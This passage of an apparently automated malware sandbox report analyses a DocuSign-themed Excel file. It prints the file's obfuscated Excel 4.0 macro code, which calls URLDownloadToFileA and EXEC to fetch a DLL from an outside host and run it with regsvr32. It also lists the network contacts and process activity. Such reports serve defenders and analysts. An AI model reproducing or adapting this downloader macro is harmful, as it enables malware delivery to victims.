                                                                                                                                                                                              Changed Hyperlinks:False
                                                                                                                                                                                              Application Version:917504

                                                                                                                                                                                              Streams

                                                                                                                                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:4096
                                                                                                                                                                                              Entropy:0.367004077607
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . 2 . . . . . . . . . 3 . . . . . . . . . 1 . . . . . . . . . 4 . . . . . . . . . 5 . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 bf 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                                                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:\x5SummaryInformation
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:4096
                                                                                                                                                                                              Entropy:0.257530318219
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . v . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 326321
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:Workbook
                                                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                              Stream Size:326321
                                                                                                                                                                                              Entropy:7.65589671346
                                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                                              Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . l . . 9 P . 8 . . . . . . . X . @ . . . . . .
                                                                                                                                                                                              Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                              Macro 4.0 Code

                                                                                                                                                                                              CALL("Ke"&????2!HV329&"32", "Cr"&????2!HX357&"yA", "JCJ", ????2!HM327&????2!HM342, 0)
                                                                                                                                                                                              
                                                                                                                                                                                              CALL("U"&????2!HX347, "U"&????4!E65, "IICCII", 0, ????2!EE100, ????2!HM327&????2!HM342&????2!HM356, 0, 0)
                                                                                                                                                                                              
                                                                                                                                                                                              =RUN(R59),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(????4!D50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""Ke""&????2!HV329&""32"",""Cr""&????2!HX357&""yA"",""JCJ"",????2!HM327&????2!HM342,0)",,,,,,,,,,,,,,,,,=RUN(????5!A50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                                                              "=CALL(""Ke""&????2!HV329&""32"",""Cr""&????2!HX357&""yA"",""JCJ"",????2!HM327,0)",,,,=RUN(????1!M66),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CONCATENATE(E67,E68,E69,E70,E71,E72,E73,E74,E75,E76,E77,E78,E79,E80,E81,E82,E83)",,,,"=CHAR(SUM(F66,G66,H66))",25,35,25,"=CHAR(SUM(F67,G67,H67))",20,42,20,"=CHAR(SUM(F68,G68,H68))",25,26,25,=CHAR(F69-G69-H69),100,22,10,=CHAR(F70-G70-H70),200,50,39,=CHAR(F71-G71-H71),500,300,81,=CHAR(F72+G72-H72),120,130,140,=CHAR(F73+G73-H73),200,300,392,=CHAR(F74+G74-H74),400,500,789,=CHAR(F75-G75+H75),500,430,27,=CHAR(F76-G76+H76),310,270,60,=CHAR(F77-G77+H77),200,160,44,"=CHAR(SUM(F78,G78,H78))",56,37,18,"=CHAR(SUM(F79,G79,H79))",27,18,25,"=CHAR(SUM(F80,G80,H80))",44,58,3,=CHAR(F81-G81-H81),384,115,161,=CHAR(F82-G82-H82),762,504,157,=CHAR(F83-G83-H83),501,328,108
                                                                                                                                                                                              "=CALL(""U""&????2!HX347,""U""&????4!E65,""IICCII"",0,????2!EE100,????2!HM327&????2!HM342&????2!HM356,0,0)"=EXEC(????3!W36&????2!HM327&????2!HM342&????2!HM356)=HALT()

                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Nov 29, 2020 05:43:24.767671108 CET49722443192.168.2.3192.185.215.146
                                                                                                                                                                                              Nov 29, 2020 05:43:24.902086020 CET44349722192.185.215.146192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:24.902194023 CET49722443192.168.2.3192.185.215.146
                                                                                                                                                                                              Nov 29, 2020 05:43:24.903067112 CET49722443192.168.2.3192.185.215.146
                                                                                                                                                                                              Nov 29, 2020 05:43:25.037353992 CET44349722192.185.215.146192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:25.046025038 CET44349722192.185.215.146192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:25.046076059 CET44349722192.185.215.146192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:25.046114922 CET44349722192.185.215.146192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:25.046174049 CET49722443192.168.2.3192.185.215.146
                                                                                                                                                                                              Nov 29, 2020 05:43:25.046216011 CET49722443192.168.2.3192.185.215.146
                                                                                                                                                                                              Nov 29, 2020 05:43:25.058681965 CET49722443192.168.2.3192.185.215.146
                                                                                                                                                                                              Nov 29, 2020 05:43:25.193451881 CET44349722192.185.215.146192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:25.193705082 CET49722443192.168.2.3192.185.215.146
                                                                                                                                                                                              Nov 29, 2020 05:43:25.194772959 CET49722443192.168.2.3192.185.215.146
                                                                                                                                                                                              Nov 29, 2020 05:43:25.369574070 CET44349722192.185.215.146192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:26.047764063 CET44349722192.185.215.146192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:26.047991037 CET49722443192.168.2.3192.185.215.146
                                                                                                                                                                                              Nov 29, 2020 05:43:26.048261881 CET44349722192.185.215.146192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:26.048352003 CET49722443192.168.2.3192.185.215.146
                                                                                                                                                                                              Nov 29, 2020 05:43:56.048547029 CET44349722192.185.215.146192.168.2.3

                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Nov 29, 2020 05:43:08.287147045 CET6083153192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:08.322855949 CET53608318.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:09.195993900 CET6010053192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:09.231643915 CET53601008.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:19.365329981 CET5319553192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:19.392410040 CET53531958.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:20.159255028 CET5014153192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:20.186542034 CET53501418.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:20.540968895 CET5302353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:20.577954054 CET53530238.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:20.896097898 CET4956353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:20.947324038 CET53495638.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:21.303567886 CET5135253192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:21.339179039 CET53513528.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:21.899750948 CET4956353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:21.935421944 CET53495638.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:22.913789034 CET4956353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:22.951438904 CET53495638.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:23.903541088 CET5934953192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:23.930747032 CET53593498.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:24.729986906 CET5708453192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:24.765631914 CET53570848.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:24.929470062 CET4956353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:24.964870930 CET53495638.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:25.340229988 CET5882353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:25.375637054 CET53588238.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:26.139772892 CET5756853192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:26.166841030 CET53575688.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:26.902848005 CET5054053192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:26.930124998 CET53505408.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:27.745297909 CET5436653192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:27.780862093 CET53543668.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:28.945235968 CET4956353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:28.980714083 CET53495638.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:29.000761986 CET5303453192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:29.036163092 CET53530348.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:34.133881092 CET5776253192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:34.161119938 CET53577628.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:41.638819933 CET5543553192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:41.677006960 CET53554358.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:47.928702116 CET5071353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:47.972584009 CET53507138.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:43:57.217247009 CET5613253192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:43:57.253931046 CET53561328.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:44:08.712270975 CET5898753192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:44:08.739459038 CET53589878.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:44:11.392256021 CET5657953192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:44:11.431380033 CET53565798.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:44:43.088643074 CET6063353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:44:43.115772009 CET53606338.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 05:44:44.249535084 CET6129253192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 05:44:44.285063982 CET53612928.8.8.8192.168.2.3

                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                              Nov 29, 2020 05:43:24.729986906 CET192.168.2.38.8.8.80x5e4dStandard query (0)seligue.netA (IP address)IN (0x0001)

                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                              Nov 29, 2020 05:43:24.765631914 CET8.8.8.8192.168.2.30x5e4dNo error (0)seligue.net192.185.215.146A (IP address)IN (0x0001)

                                                                                                                                                                                              HTTPS Packets

                                                                                                                                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                              Nov 29, 2020 05:43:25.046114922 CET192.185.215.146443192.168.2.349722CN=webdisk.seligue.net CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Nov 20 17:49:32 CET 2020 Thu Mar 17 17:40:46 CET 2016Thu Feb 18 17:49:32 CET 2021 Wed Mar 17 17:40:46 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                              CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021

                                                                                                                                                                                              Code Manipulations

                                                                                                                                                                                              Statistics

                                                                                                                                                                                              Behavior

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              System Behavior

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:05:43:18
                                                                                                                                                                                              Start date:29/11/2020
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                              Imagebase:0x10a0000
                                                                                                                                                                                              File size:27110184 bytes
                                                                                                                                                                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:05:43:25
                                                                                                                                                                                              Start date:29/11/2020
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
                                                                                                                                                                                              Imagebase:0xe60000
                                                                                                                                                                                              File size:20992 bytes
                                                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Disassembly

                                                                                                                                                                                              Code Analysis

                                                                                                                                                                                              Reset < >